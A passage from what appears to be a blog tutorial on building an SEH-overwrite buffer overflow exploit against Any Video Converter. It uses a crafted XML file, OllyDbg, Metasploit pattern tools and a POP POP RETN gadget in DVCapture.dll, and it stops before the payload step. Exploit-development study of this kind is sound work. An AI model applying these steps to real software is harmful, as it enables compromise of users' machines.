2. copy file xml to directory of any video converter and open any video used ollydbg then run
look the register ESP , there show character 'A'
for by pass register EIP go SEH Chain and press Shift+F9
3. now we make the pattern create
open console and type
#cd /opt/metasploit/msf3/tools
#./pattern_create.rb 1000
copy data to fuzzer
run fuzzer and copy file xml to direcroy any video again then open any video via ollydbg
by pass, go to SEH chain and press Shift+F9
6. next step, we want ensure a module for jump to overwrite address of SEH
select executable module->DVCapture.dll and copy to backtrack via feature virtualbox.
here i save on my directory /Worked
#cd /opt/metasploit/msf3/
#./msfpescan -i /media/Worked/dvcapture.dll | grep SEHandler
#./msfpescan -i /media/Worked/dvcapture.dll |
#grep DllCharacteristics
this module don't have protect SEH or SafeSEH, so this can be used as JUMP to address of SEH
5. now we make pattern offset
like ussualy,
#cd /opt/meatsploit/msf3/tools
#./pattern_offset.rb 316C4130
332
dont forget to tide breakpoint on address of SEH
executable module->dvcapture.dll
click right select search for->sequence command
POP r32
POP r32
RETN
and press Find
next click right and breakpoint
6. Edit fuzzer
run fuzzer and copy file xml to directory any video on winxp then open via ollydbg
look SEH chain, there register EIP have affected by buffer ( EIP CCCCCC )
now input address of dvcapture with POP, POP RETN to fuzzer
after run look SEH chain ( if SEH Chain leads to dvcapture, that is right and your fuzzer is successfull )
7. make payload
(still working....)
No comments:
Post a Comment